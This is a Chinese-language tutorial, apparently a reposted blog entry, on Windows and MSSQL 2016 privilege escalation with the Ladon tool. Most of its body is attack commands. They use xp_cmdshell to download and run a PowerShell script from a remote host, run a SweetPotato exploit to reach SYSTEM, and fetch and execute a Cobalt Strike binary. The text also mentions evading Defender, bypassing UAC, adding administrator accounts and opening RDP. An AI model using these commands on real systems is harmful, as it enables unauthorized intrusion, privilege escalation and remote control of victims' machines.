〖教程〗Ladon提权Win2016/Win10/MSSQL2016

测试环境

Windows Server 2016
SQL: 13.0.1601.5
Microsoft Windows [Version 10.0.14393]

Ladon本地用户权限提权

网上找了些LPE，发现直接被Defender杀，病毒库更新至2021.1.19，Ladon没被杀，管理员UAC权限可通过BypassUac提权

MSSQL远程加载Ladon提权

执行SQL查询权限为network service

远程内存加载PowerLadon提权

exec master..xp_cmdshell ‘powershell "IEX (New-Object Net.WebClient).DownloadString(‘‘http://xxxxxx.800/Ladon.ps1‘‘); Ladon SweetPotato "whoami""‘

ECHO写入BAT执行多行命令提权

exec master..xp_cmdshell ‘echo whoami > c:\users\public\test.bat‘

可ECHO写入添加管理员用户命令或者开3389等操作（举一反三不要只懂WHOAMI）

使用SYSTEM权限执行BAT

exec master..xp_cmdshell ‘powershell "IEX (New-Object Net.WebClient).DownloadString(‘‘http://xxxx:800/Ladon.ps1‘‘); Ladon SweetPotato "c:\users\public\test.bat""‘

Wget下载Coblat Strkie的EXE

exec master..xp_cmdshell ‘powershell "IEX (New-Object Net.WebClient).DownloadString(‘‘http://xxxx:800/Ladon.ps1‘‘); Ladon wget http://k8gege.org/cs.exe"‘

使用SYSTEM权限执行CS

exec master..xp_cmdshell ‘powershell "IEX (New-Object Net.WebClient).DownloadString(‘‘http://xxxx:800/Ladon.ps1‘‘); Ladon SweetPotato "c:\users\public\cs.exe""‘

工具下载

最新版本：https://k8gege.org/Download
历史版本: https://github.com/k8gege/Ladon/releases

〖教程〗Ladon提权Win2016/Win10/MSSQL2016

原文：https://www.cnblogs.com/k8gege/p/14305943.html